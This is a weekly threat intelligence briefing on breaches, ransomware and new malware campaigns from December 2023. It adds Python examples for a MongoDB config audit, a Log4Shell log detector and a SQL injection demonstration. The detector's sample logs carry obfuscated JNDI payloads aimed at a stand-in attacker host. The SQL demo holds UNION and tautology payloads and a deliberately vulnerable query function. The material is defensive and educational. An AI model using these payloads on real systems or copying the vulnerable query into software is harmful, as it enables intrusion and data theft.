
Cyware Weekly Threat Intelligence - December 11–15


Weekly Threat Briefing Dec 15, 2023

The Good

As the cyber threat landscape grows grimmer, proactive measures are being taken to mitigate potential impacts. Amid the surge in software supply chain attacks, U.S. government agencies have issued guidance on the safe use of SBOMs and open-source repositories. Separately, MITRE launched a new threat model framework, named EMB3D, to address threats against OT and ICS.

  • MITRE unveiled a new threat model framework named EMB3D to help government agencies and private organizations safeguard their Operational Technology (OT) and Industrial Control Systems (ICS). It offers a knowledge base of cyber threats to embedded devices and lets users map those threats to known weaknesses and vulnerabilities through existing frameworks such as CWE, CVE, and MITRE ATT&CK. The framework also suggests mitigations, emphasizing technical mechanisms that device vendors can implement against specific threats. It is scheduled for public release in early 2024.

  • U.S. lawmakers allocated $874.2 billion under the 2024 National Defense Authorization Act, a portion of which will be used to refine defensive and offensive cyber skill sets. Measures include creating a cross-functional team to defend against threats to Nuclear Command, Control, and Communications (NC3), developing robust cyber support mechanisms, and creating a bureau chief data officer program to improve data fluency.

  • The NSA, ODNI, CISA, and industry partners released joint guidance to bolster defenses against software supply chain attacks. The guidance primarily covers how to manage and maintain SBOMs and open-source software. It also details what to consider when adopting open-source software and how to distribute approved software components using an SBOM.

  • Microsoft's Digital Crimes Unit seized multiple domains operated by the Vietnam-based Storm-1152 cybercrime group, which sold over 750 million fake Microsoft accounts and related tools through fake websites and social media, generating millions of dollars in illegal profits. The fake accounts were then used to conduct mass phishing attacks, identity theft, and DDoS attacks.

The Bad

Database security is back in the limelight after DonorView and the Dubai Taxi Company were found leaking troves of sensitive data from misconfigured databases. Meanwhile, several prominent institutions and firms, including Kyivstar, Toyota Financial Services, and Americold, fell victim to cyberattacks.

  • Tri-City Medical Center in California, which resumed operations 17 days earlier following a ransomware attack, is facing ongoing extortion attempts by the INC RANSOM group. The group posted samples on its dark web site as proof that it holds records stolen from the hospital, including prior authorization forms, financial records, and patient information. The full extent of the breach remains unclear, and there is no confirmation that the attackers reached the hospital's EMR system.

  • A misconfigured database owned by the fundraising platform DonorView exposed nearly one million records containing donors' names, addresses, phone numbers, email addresses, and payment methods. The records also contained sensitive details about children, such as medical information, images, and the names of attending doctors.

  • The Dubai Taxi Company left a MongoDB database open to the public, exposing a trove of sensitive information on roughly 197K users and 23K drivers. The exposed data included banking details, email addresses, phone models, login credentials, driver's license numbers, work permit numbers, and nationalities.

  • Ukrainian telecom operator Kyivstar was hit by a cyberattack that knocked its internet access and mobile communications offline. Market analysis firm TeleGeography estimated that roughly half of Ukraine's mobile subscriber base was affected by the outage. The operator stated, however, that subscribers' personal data was not compromised.

  • Researchers uncovered hundreds of fake LinkedIn profiles targeting professionals at companies in Saudi Arabia. The attackers built well-connected synthetic identities to make the profiles credible and then sent connection requests to victims in order to harvest their contact lists and other information.

  • A ransomware attack on cold storage giant Americold affected nearly 130,000 people, including current and former employees. The investigation revealed that names, addresses, Social Security numbers, passport numbers, financial information, and medical information were compromised in the incident.

  • Sony opened an investigation into an alleged ransomware attack on its subsidiary Insomniac Games after the Rhysida threat actor threatened to sell the stolen data unless a ransom of $2 million was paid within seven days. Company officials believe that no other Sony Interactive Entertainment (SIE) or Sony divisions were affected by the incident.

  • Toyota Financial Services disclosed a data breach that exposed customers' personal and financial data. Threat actors gained unauthorized access to Kreditbank's systems and stole customers' full names, residential addresses, contact information, and lease-purchase details.

  • Kentucky-based Norton Healthcare confirmed that attackers stole the data of around 2.5 million people in the May ransomware attack. The data included driver's license and government ID numbers, financial information, and digital signatures. Health information, insurance information, and medical ID numbers belonging to former patients, employees, and employees' dependents and beneficiaries were also affected.

  • A new wave of BazarCall attacks used Google Forms to deliver malware to victims' systems. The forms were sent via phishing emails and listed details of a fake transaction, such as the invoice number, date, and payment method, to create a sense of urgency. To cancel the supposed subscription or dispute the charge, recipients were urged to call a toll-free number that actually belonged to the threat actor. On the call, the victim was talked into installing the BazarLoader malware.

  • In an update, the Idaho National Laboratory revealed that sensitive information on 45,047 current and former employees, as well as their spouses and dependents, was affected in the cyberattack of November 20. The exposed information includes names, SSNs, salary information, and banking details.

  • Healthcare device manufacturer LivaNova PLC fell victim to the LockBit ransomware group. The attack, detected on December 9, allegedly exposed 2.2TB of sensitive data, including product specifications, employee information, and financial documents. The threat actor has listed the stolen data on its leak site and set a deadline for its public release.

  • Food and beverage company Kraft Heinz opened an investigation into a cyber incident after the Snatch ransomware group added the company to its victim list. The company has not verified the attackers' claim and said the criminals appeared to have targeted a decommissioned marketing site hosted on an external platform.

  • Ledger revealed that attackers pushed a malicious version of its Ledger dApp Connect Kit library, stealing around $600,000 in cryptocurrency and NFTs. The malicious code used a rogue WalletConnect project to reroute funds to an attacker-controlled wallet. It is not yet clear how many people were affected.
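
The DonorView and Dubai Taxi Company leaks above share one root cause: a database reachable from the Internet with no authentication in front of it. The following is an added example, written for this briefing and not code from Cyware or from either company, that audits a mongod.conf for exactly that pattern. The two configuration texts are constructed samples; the checker reads only the `section:` / `  key: value` subset of YAML that mongod.conf uses, so it needs no third-party library.

```python
"""Audit a mongod.conf for the 'open to the Internet, no auth' pattern.

Added example for this briefing (not Cyware's or MongoDB's code).  Both
configuration texts below are constructed samples.
"""
from typing import Dict, List

# Constructed sample: the weak configuration (bound to every interface, no auth).
WEAK_CONF = """\
# mongod.conf (constructed sample)
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 0.0.0.0
"""

# Constructed sample: the corrected configuration.
HARDENED_CONF = """\
# mongod.conf (constructed sample)
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 127.0.0.1,10.0.5.12   # loopback plus the app subnet only
security:
  authorization: enabled
"""

FINDING_PUBLIC = "mongod is bound to all interfaces (net.bindIp / net.bindIpAll)"
FINDING_NO_AUTH = "security.authorization is not enabled"
FINDING_CRITICAL = "CRITICAL: unauthenticated database reachable from any network"

# Bind addresses that mean "every interface" to mongod.
PUBLIC_BINDINGS = {"0.0.0.0", "::", "*"}


def parse_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Read the two-level 'section:' / '  key: value' YAML subset mongod.conf uses."""
    conf: Dict[str, Dict[str, str]] = {}
    section = None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()      # drop comments
        if not line.strip():
            continue
        if not line.startswith(" ") and line.endswith(":"):
            section = line[:-1].strip()           # top-level section header
            conf.setdefault(section, {})
        elif section is not None and ":" in line:
            key, value = line.strip().split(":", 1)
            conf[section][key.strip()] = value.strip()
    return conf


def audit_mongod_conf(text: str) -> List[str]:
    """Return findings for the config text; an empty list means the pattern is absent."""
    conf = parse_conf(text)
    net = conf.get("net", {})
    security = conf.get("security", {})
    findings: List[str] = []

    # mongod defaults: bindIp = localhost only, authorization = disabled.
    bind = net.get("bindIp", "127.0.0.1")
    bind_all = net.get("bindIpAll", "false").lower() == "true"
    public = bind_all or any(a.strip() in PUBLIC_BINDINGS for a in bind.split(","))
    if public:
        findings.append(FINDING_PUBLIC)

    auth_on = security.get("authorization", "disabled").lower() == "enabled"
    if not auth_on:
        findings.append(FINDING_NO_AUTH)

    # The combination is what produced the leaks, so report it on its own line.
    if public and not auth_on:
        findings.append(FINDING_CRITICAL)
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, "->", audit_mongod_conf(conf) or ["no findings"])
```

A public bind with authorization enabled is reported as a hardening gap, while a public bind without it gets the separate critical finding, because that combination is the DonorView and Dubai Taxi situation. The check is worth running against the container image or orchestration manifest that generates the file, since that is usually where `0.0.0.0` creeps in.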

New Threats

This week, Lazarus and Fancy Bear expanded their malware arsenals to target more organizations. Lazarus introduced three DLang-based malware families, while Fancy Bear was linked to the custom HeadLace backdoor. Elsewhere, SOHO routers came under attack from the operators of the KV-Botnet, and NKAbuse became the first known malware to abuse the NKN blockchain network.

  • ESET Research discovered 116 malicious packages on the PyPI repository. The packages targeted both Windows and Linux systems and delivered either a W4SP stealer variant or a clipboard monitor designed to steal cryptocurrency. In some cases, a backdoor was delivered in the final stage to execute arbitrary commands, exfiltrate data, and take screenshots. The packages had been downloaded over 10,000 times.
  • The North Korea-linked Lazarus group was tied to a new global campaign that exploits the Log4Shell flaw in Log4j (CVE-2021-44228) to deploy three previously undocumented DLang-based malware families: NineRAT, DLRAT, and BottomLoader. The campaign, dubbed Operation Blacksmith, is believed to have been active since March and targeted organizations in the manufacturing, agriculture, and physical security sectors.
  • An attack campaign attributed to Fancy Bear was observed using lures related to the ongoing Israel-Hamas war to deliver a custom backdoor called HeadLace. The campaign targeted critical infrastructure organizations across Hungary, Turkey, Australia, Poland, Belgium, Ukraine, Germany, Azerbaijan, Saudi Arabia, Kazakhstan, Italy, Latvia, and Romania. The infection chain exploited the WinRAR flaw CVE-2023-38831 to deliver the backdoor.
  • A series of SQL injection attacks against companies in the Asia-Pacific region was attributed to a previously unknown threat actor tracked as GambleForce. The attacks relied on open-source tools such as dirsearch, sqlmap, tinyproxy, and redis-rogue-getshell, with the ultimate goal of exfiltrating sensitive information from compromised networks.
  • Researchers linked a sophisticated botnet, tracked as KV-Botnet, to the China-linked Volt Typhoon threat actor. The botnet targets SOHO routers and VPN appliances, some of which have reached end of life. It has been active since at least 2022 and, judging by its target scope, is believed to be used for espionage and information gathering.
  • A new Go-based malware named NKAbuse is the first known strain to abuse the New Kind of Network (NKN) blockchain technology for stealthy command-and-control communications. The multi-platform malware was observed targeting Linux desktops in Mexico, Colombia, and Vietnam. In one attack on a financial company, it was delivered by exploiting an old Apache Struts flaw (CVE-2017-5638). The malware acts as a remote access trojan and also includes DDoS capabilities.
  • ESET researchers discovered a new campaign by the OilRig group that used three new malware downloaders, ODAgent, OilCheck, and OilBooster, against organizations in Israel. The attackers also deployed an updated version of the SampleCheck5000 downloader in attacks against Israeli targets. The targeted organizations belonged to the healthcare, manufacturing, and government sectors.
  • The Gaza Cyber Gang deployed an updated version of the Pierogi backdoor against Palestinian entities. The malware, tracked as Pierogi++, is written in C++ and can take screenshots, execute commands, and download malicious files. It is distributed via decoy documents written in Arabic and English.
  • Proofpoint warned recruiters about a campaign targeting them with emails designed to deploy the More_Eggs backdoor. The campaign, run by the financially motivated TA4557 threat actor throughout 2022 and 2023, relied on third-party job boards to reach recruiters. Alternatively, the actor replied to job postings with a PDF or Word attachment containing instructions that redirected victims to fake resume websites.
  • A month after Netgate released patches, around 1,459 pfSense instances were still vulnerable to command injection and cross-site scripting flaws that can be chained for remote code execution on the appliance. The flaws are tracked as CVE-2023-42325 (XSS), CVE-2023-42327 (XSS), and CVE-2023-42326 (command injection).
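
The Log4j flaw that Operation Blacksmith exploits is still being abused two years after disclosure partly because the lookup string is easy to obfuscate: `${jndi:...}` can be written as `${${lower:j}ndi:...}`, assembled from default-value lookups such as `${::-j}`, or URL-encoded in a request path, and a naive substring match misses all three. The following is an added example, not code from the briefing or from the researchers who reported the campaign, that normalizes those forms before matching. The access-log lines are constructed samples, and the attacker addresses in them are documentation ranges.

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in web access logs.

Added example for this briefing (not Cyware's code).  The log lines are
constructed samples; 203.0.113.9 is a documentation address.
"""
import re
from urllib.parse import unquote
from typing import List, Tuple

# Constructed Apache/Nginx-style access log lines.  Lines 2-4 carry payloads in
# three different encodings; lines 1 and 5 are benign (line 5 has a harmless
# ${version} placeholder that must not trigger).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2023:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Dec/2023:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.9:1389/a}"',
    '203.0.113.9 - - [12/Dec/2023:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://203.0.113.9/b}"',
    '203.0.113.9 - - [12/Dec/2023:10:01:11 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.9%2Fc%7D HTTP/1.1" 404 0 "-" "curl/8.0"',
    '10.0.0.7 - - [12/Dec/2023:10:02:00 +0000] "GET /docs/${version} HTTP/1.1" 200 100 "-" "Mozilla/5.0"',
]

# Innermost lookups only: a ${...} with no further "${", "{" or "}" inside.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we are looking for once the obfuscation has been expanded.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(token: str) -> str:
    """Expand one innermost lookup the way the attacker expects Log4j to expand it."""
    if ":-" in token:                       # ${env:NOPE:-j} or ${::-j} -> "j"
        return token.split(":-", 1)[1]
    kind, _, arg = token.partition(":")
    kind = kind.lower()
    if kind == "lower":                     # ${lower:J} -> "j"
        return arg.lower()
    if kind == "upper":                     # ${upper:n} -> "N"
        return arg.upper()
    return "${" + token + "}"               # jndi:, date:, unknown: leave untouched


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL-encoding and expand nested lookups until the string stops changing."""
    for _ in range(max_rounds):
        expanded = _INNER.sub(lambda m: _resolve(m.group(1)), unquote(text))
        if expanded == text:
            return text
        text = expanded
    return text


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize(line)
        if _JNDI.search(normalized):
            hits.append((number, normalized))
    return hits


if __name__ == "__main__":
    for number, line in scan_lines(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

Matching is done on the normalized string, so the rule stays a single regex no matter how many layers of `lower`, `upper`, default-value or percent-encoding the payload stacks up. The `_resolve` step deliberately leaves unknown lookup types alone; only the transformations an attacker can use to rebuild the letters `jndi` are expanded.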
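
GambleForce's toolkit is notable for how ordinary it is: sqlmap does nothing that a hand-written UNION or tautology payload cannot, it only automates the guessing. The following is an added example, not code from the briefing or from the researchers who tracked the group, that puts a vulnerable lookup beside its parameterized form against an in-memory SQLite database. The schema, rows, and payloads are constructed for illustration.

```python
"""SQL injection: vulnerable string-built query beside its parameterized fix.

Added example for this briefing (not Cyware's code).  Schema, rows and
payloads are constructed; the 'secret' value is a placeholder, not a key.
"""
import sqlite3
from typing import List, Tuple


def build_db() -> sqlite3.Connection:
    """Constructed sample: a table the app queries and one it never intends to expose."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT);
        CREATE TABLE api_keys (id INTEGER PRIMARY KEY, owner TEXT, secret TEXT);
        INSERT INTO users (username, email) VALUES ('alice', 'alice@example.test');
        INSERT INTO users (username, email) VALUES ('bob', 'bob@example.test');
        INSERT INTO api_keys (owner, secret) VALUES ('billing', 'sk_test_CONSTRUCTED_0001');
    """)
    return conn


def find_email_vulnerable(conn: sqlite3.Connection, username: str) -> List[Tuple]:
    """Deliberately vulnerable: attacker-controlled text is spliced into the SQL."""
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def find_email_safe(conn: sqlite3.Connection, username: str) -> List[Tuple]:
    """Hardened: the value is bound as a parameter, so it can never become SQL."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# UNION-based payload of the kind sqlmap automates: close the string, append a
# second SELECT against a table the original query never referenced, and
# comment out the trailing quote.
UNION_PAYLOAD = "x' UNION SELECT owner, secret FROM api_keys --"

# Tautology payload: turns a point lookup into a full-table dump.
TAUTOLOGY_PAYLOAD = "x' OR '1'='1"


if __name__ == "__main__":
    db = build_db()
    for label, payload in (("union", UNION_PAYLOAD), ("tautology", TAUTOLOGY_PAYLOAD)):
        print(label, "vulnerable ->", find_email_vulnerable(db, payload))
        print(label, "safe       ->", find_email_safe(db, payload))
```

Against the vulnerable function the UNION payload returns the `api_keys` row and the tautology returns every user; against the parameterized function both payloads are simply usernames that do not exist and return nothing. The fix is the parameter binding, not input filtering: any quoting or blocklist the attacker can study, sqlmap's tamper scripts can usually get around.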
